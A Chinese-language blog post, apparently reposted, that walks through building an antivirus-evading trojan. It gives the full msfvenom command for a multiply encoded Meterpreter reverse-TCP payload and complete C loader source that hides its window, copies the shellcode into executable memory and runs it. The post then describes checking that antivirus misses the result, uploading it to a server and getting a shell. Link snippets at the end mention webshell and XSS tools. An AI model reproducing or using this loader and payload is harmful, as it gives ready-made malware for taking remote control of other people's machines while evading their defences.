2021Kali -- 木马免杀制作

​知道为什么梦里的人都看不清脸么?因为怕你当真。。。

----  网易云热评   

一、通过MSF生成shellcode

1、启动MSF,演示版本是6.0.36

2、通过msfvenom生成相关代码

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=192.168.139.133 lport=8585 -f c

-p:指定payload

-e:指定选择使用的编码

-i:给payload编码的次数

-b:避免出现的字符

-f:输出文件类型

 

二、通过VS2019编译免杀木马

1、启动VS2019新建控制台应用程序

2、一路下一步,最后将主函数代码替换成下面的代码

 

#include<stdio.h>#include<windows.h>#include <time.h>int main(int argc, char const* argv[]){       ShowWindow(GetConsoleWindow(), SW_HIDE);       unsigned char buf[] =  "\xbf\xc2\xd4\x1d\x34\xd9\xc9\xd9\x74\x24\xf4\x58\x31\xc9\xb1""\xa3\x31\x78\x15\x03\x78\x15\x83\xe8\xfc\xe2\x37\x6a\x4e\xf4""\xfe\x20\xa8\x3f\xd9\x33\x6f\x34\x86\x88\xa6\x05\xa5\xde\x4f""\x74\x56\xcf\x4c\x7b\x7c\xde\x06\x3a\x6f\xdf\xaa\x1e\x08\xb5""\x15\x96\x18\x69\x5c\x22\x14\x76\x4d\x5a\x55\x46\x84\x4c\xf6""\x5c\xbe\x11\x6f\xce\x02\xa7\xd4\xc0\xc5\xcc\xb8\x72\x3c\xe3""\x45\x50\x2a\x3a\x10\x64\x23\xb4\x8a\xae\x53\x8f\x59\xe4\xec""\xed\x4d\x59\x44\x4a\x1b\x64\x03\x94\xfd\x7b\xb2\x45\x76\x80""\x1d\x95\x02\x81\x32\xed\x5f\x14\x10\x1c\x08\x1f\x3c\xb3\x4b""\x79\xfe\x0c\xa1\x52\xea\x56\xcb\xae\x44\x09\x9a\x7b\xc2\x30""\x25\x7e\x8e\x31\x88\xcc\xf8\x8c\x71\xe5\xde\x79\xbc\x77\x40""\x82\x97\xea\x9a\x36\xe6\xc4\xab\xd7\xc0\xb2\xc6\xa7\x79\xa0""\x9c\x9a\x07\x70\x9b\xe6\x81\x53\x6d\xe5\x4c\xe7\x46\x28\xdb""\x61\x0f\x51\x8e\xca\xcb\x40\xdf\x68\xf7\x73\x2d\xe4\xf0\xea""\xe1\x83\x95\x97\x91\xd2\x46\x51\x8c\xcb\x15\x2a\xb2\xc0\xe6""\x78\x9d\xfd\x3e\x2c\xeb\x6c\xbc\x40\x05\x5b\x2b\x16\x48\x1b""\x01\x09\x38\xdf\xd8\xec\x23\x94\x60\x76\x73\x48\x48\xe9\xe1""\xf4\x5e\x8d\xbf\x95\x46\xae\x66\xc8\x37\x0d\x43\x02\xbd\x4d""\x66\x82\x9d\xf9\x46\xc1\x03\x22\x73\x14\xcd\x0a\x12\x83\xf9""\x54\x04\x7e\x6d\x71\xd7\x8c\x0c\x99\x81\x88\x2d\x62\xcd\xf0""\x6e\x3c\x1c\xa8\x07\xa0\x9d\x43\x5e\xb3\x6b\x2f\x9f\xc3\x66""\x3f\xad\xc3\x99\xde\x83\x22\x7e\x84\x85\x4a\x9c\x41\x85\xb6""\xbd\x04\x39\x7d\xde\x4f\x8d\x86\xfc\x95\xb9\x22\xf1\x63\xfb""\x6c\x59\x2e\x7c\x95\xdf\x1f\x45\x88\x2a\x2f\x7a\x9c\xf1\x75""\xff\x90\x6e\x90\x20\x1e\x6f\x4e\x52\x7d\x1d\xab\x47\x15\x94""\x7e\xf0\x7c\x56\x21\xb4\xdd\xf0\x0b\xdc\x22\x43\x91\x08\x21""\x89\x63\xdc\x54\xc3\xc4\x10\x9d\x9c\xdc\x76\xae\xb4\xf3\x33""\xbd\x57\xb0\xf2\xf9\xbf\xfb\xae\x0d\x8e\x33\x5f\xc4\xdf\xa1""\x74\xd3\xe8\xdf\xbf\xfd\xff\x3c\x1b\x63\x60\x06\x32\xba\x42""\x2c\xd5\x13\xd5\x2a\x93\x5a\x77\xc4\xf0\x70\xb1\x6e\x41\xd0""\x55\x02\xd2\x57\x5e\xf9\x08\x65\xbc\xff\x19\xf7\x45\x9f\x6d""\x6a\x17\x7f\xb1\xae\x8e\xb9\x26\xe0\x28\x0e\xe2\x53\x1a\x0d""\xf8\xc7\xea\xa7\x3e\x5a\xbd\xc9\x30\xf3\x7e\x58\xbc\xe9\x68""\x4d\xb3\x78\xce\x69\x45\x53\x85\xc0\xba\x2a\x9f\x01\xe9\xba""\x43\xee\x8b\x20\x0b\x86\x48\x28\x2c\x72\x64\xfc\x84\x7d\xd6""\xa2\xe5\x73\x56\x7b\x61\xbf\xb8\x30\x23\xb7\x90\x66\x4e\xf6""\xdf\xde\xd4\xd9\x12\xb6\x97\x39\x3e\xed\x1f\xdc\x04\x7e\x81""\x41\x48\xd1\x91\x20\x02\x69\xff\x33\xdb\x87\x7a\xf0\x9c\xa5""\xb2\x3a\x2e\x6b\x4e\xd0\xe1\x76\x24\xbc\xf5\xc8\x26\xf1\x94""\x89\x1d\x2f\xc0\x80\x01\x07\x49\xef\xb2\xb0\x79\x6f\x90\x5a""\x66\x44\xd5\x48\x13\x19\x6e\xa7\xf0\x34\x3f\x93\xe2\x32\x83""\x84\xfe\x3a\x26\x6d\x59\x6b\xe5\x9c\x78\x72\x97\x01\xeb\x90""\x2f\x92\x2f\x83\x96\x52\x93\x5f\xd4\x89\xab\x32\xf9\x29\x2f""\xa6\xe2\x1c\x94\xf0\xdc\xa9\x5c\x88\x78\xde\xca\x7f\x3a\xbf""\xac\xc1\xf3\x7f\x38\xba\xf7\xd0\xd5\x1e\x8e\xa7\xfc\x99\xec""\x12\x83\xc2";       void* exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT,  PAGE_EXECUTE_READWRITE);       memcpy(exec, buf, sizeof buf);       ((void(*)())exec)();              return 0;}

3、生成解决方案

4、右击生成的木马,使用36X扫描

 

三、实战操作

1、上传生成的木马到服务器,假设就是本地服务器

2、打开msf,选择合适的攻击模块,run运行

3、在服务器运行免杀木马,成功获取shell

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/358749.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

OpenCV与YOLO学习与研究指南

引言 OpenCV是一个开源的计算机视觉和机器学习软件库&#xff0c;而YOLO&#xff08;You Only Look Once&#xff09;是一个流行的实时对象检测系统。对于大学生和初学者而言&#xff0c;掌握这两项技术将大大提升他们在图像处理和机器视觉领域的能力。 基础知识储备 在深入…

目录爆破工具 -- dirsearch

我记得&#xff0c;以前总会和你聊的很晚很晚&#xff0c;现在我们不再说话了&#xff0c;我还是会熬夜&#xff0c;但我想&#xff0c;不如从今天开始早点睡吧。。。 一、环境&#xff1a;Kali2020.01、Python3.0 二、安装过程&#xff1a; 1、复制dirsearch到本地安装包 gi…

java coin介绍_代码示例中的Java 7:Project Coin

java coin介绍该博客通过代码示例介绍了一些新的Java 7功能&#xff0c;这些项目在Project Coin一词下进行了概述。 Project Coin的目标是向JDK 7添加一组小的语言更改。这些更改确实简化了Java语言语法。 更少的打字&#xff0c;更简洁的代码&#xff0c;愉悦的开发人员&#…

在Java中实现过滤器和面包店锁

为了了解锁的工作方式&#xff0c;实现自定义锁是一个好方法。 这篇文章将展示如何在Java上实现Filter和Bakery锁&#xff08;自旋锁&#xff09;&#xff0c;并将它们的性能与Java的ReentrantLock进行比较。 过滤器锁和面包房锁满足互斥并且也是无饥饿算法&#xff0c;面包房锁…

Burpsuite工具的证书安装

Burpsuite工具的证书安装 Bursuite作为一款可以用来挖掘各种各样的WEB安全漏洞工具&#xff0c;在web安全渗透方面经常会使用到&#xff0c;可以用Bursuite进行对数据的抓包&#xff0c;其不安装证书时只能抓取http的包&#xff0c;安装证书就可以抓取https包&#xff0c;并分析…

物资申请php,php学生捐赠物品管理系统

捐赠物品管理系统采用php编程语言开发,mysql作为后台数据库支持,运行在wamp,appserv等集成环境上.为了方便学生捐赠物品&#xff0c;让更多的贫困人民得到更多的帮助&#xff0c;开发一套校园物品捐赠系统是十分必要的。而且可以培养学生的社会责任感&#xff0c;让他们更加富有…

哥斯拉Webshell

一&#xff0e;启动 命令&#xff1a;java -jar Godzilla-V2.96.jar 启动时同目录会生成data.db数据库存放数据 启动成功界面如下 二&#xff0e;使用&#xff08;在本机实测&#xff09; 这里演示jsp文件进行连接&#xff08;需要提前配置好jsp环境&#xff09; 1.点击管…

一次线上ctf的网络协议分析

拿到的是两个东西 我们先看secret.log 很多乱码但是有一串16进制数 把这段复制下来&#xff0c;我们放到HxD看 点击新建&#xff0c;直接粘贴 发现不对&#xff0c;观察头部&#xff0c;发现少了一个数&#xff08;5&#xff09; 因为加上5就是一个rar头部 即 导出来&…

Hibernate Collection Cache如何工作

介绍 之前&#xff0c;我描述了Hibernate用于存储实体的二级缓存条目结构。 除了实体&#xff0c;Hibernate还可以存储实体关联&#xff0c;本文将阐明集合缓存的内部工作原理。 领域模型 对于即将进行的测试&#xff0c;我们将使用以下实体模型&#xff1a; 存储库具有一组C…

模拟服务器和客户端交互的python脚本

脚本&#xff1a; 模拟服务器和客户端交互&#xff1a; import argparse, socket from datetime import datetimeIP "127.0.0.1" CODING "utf8" MAX_BYTES 65535 # UDP最大长度def server(port): # port&#xff1a;端口号sock socket.socket(socke…

动态规划 dynamic programming

动态规划dynamic programming June,7, 2015 作者&#xff1a;swanGooseMan 出处&#xff1a;http://www.cnblogs.com/swanGooseMan/p/4556588.html 声明&#xff1a;本文采用以下协议进行授权&#xff1a; 自由转载-非商用-非衍生-保持署名|Creative Commons BY-NC-ND 3.0 &…

利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞

JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程漏洞原理 复现过程启动环境端口设置浏览器设置BurpSuit设置 复现漏洞序列化数据生成发送POCEXP Vulnhub官方复现教程 https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ 漏洞原理 这…

linux mysql 安装启动失败,Linux服务器一键安装包的mysql启动失败

Linux服务器上用一键安装包配置的环境&#xff0c;启动mysql失败&#xff0c;提示如下错误信息&#xff1a;排查方法&#xff1a;1、查看服务器的磁盘空间是否正常&#xff0c;登录服务器执行命令df -h查看磁盘空间&#xff0c;如果服务器的系统盘或者数据盘空间满了&#xff0…

Ubuntu 安装mysql和简单操作

ubuntu上安装mysql非常简单只需要几条命令就可以完成。 1. sudo apt-get install mysql-server2. apt-get isntall mysql-client3. sudo apt-get install libmysqlclient-dev安装过程中会提示设置密码什么的&#xff0c;注意设置了不要忘了&#xff0c;安装完成之后可以使用如…

在BurpSuite中安装Jython环境

在BurpSuite中安装Jython环境 下载模块 下载地址 https://www.jython.org/download.html 下载 Jython Standalone版本的 打开burp 第一个框子是刚刚下载jar包 第二个时候python的模块文件地址 要到 lib\site-packages里面 成功 转载于&#xff1a;https://blog.csdn.net/w…

matlab dtft的函数,DTFT的Matlab矩阵计算的理解

其实是早应该想到的&#xff0c;今天写程序的时候想到了。然后&#xff0c;跟同学说起来&#xff0c;说&#xff0c;原来国外的教材很多都是矩阵的形式来表示离散傅里叶变换的。但是国内的教材没有这么表达。一个是&#xff0c;自己看的东西还是少了&#xff0c;一个是&#xf…

xss测试工具(xsstrike基于python)

xsstrike很强 项目地址&#xff1a; https://github.com/s0md3v/XSStrike安装&#xff1a; git clone https://github.com/s0md3v/XSStrike.git使用文档&#xff1a; https://github.com/s0md3v/XSStrike/wiki/Usageusage: xsstrike.py [-h] [-u TARGET] [--data DATA] [-t …

变量和字符串

变量名就像我们现实社会的名字&#xff0c;把一个值赋值给一个名字时&#xff0c;Ta会存储在内存中&#xff0c;称之为变量&#xff08;variable)&#xff0c;在大多数语言中&#xff0c;都把这种动作称为&#xff08;给变量赋值&#xff09;或&#xff08;把值存储在变量中&am…

Windows安全配置加固

安全配置加固——账号口令 账号优化 目的是为了梳理系统中的账号以及口令&#xff0c;避免默认账号及弱口令的存在 查看账号方式 在Windows中查看账号的方式有以下几种&#xff0c;这里就来简述一下 第一种&#xff1a;开始->运行->compmgmt.msc&#xff08;进入计算…

存根类 测试代码 java_常规单元测试和存根–测​​试技术4

存根类 测试代码 java我的上一个博客是有关测试代码的方法以及讨论您做什么和不必进行测试的方法的一系列博客中的第三篇。 它基于我使用一种非常常见的模式从数据库检索地址的简单方案&#xff1a; …并且我提出了这样的想法&#xff0c;即任何不包含任何逻辑的类实际上都不需…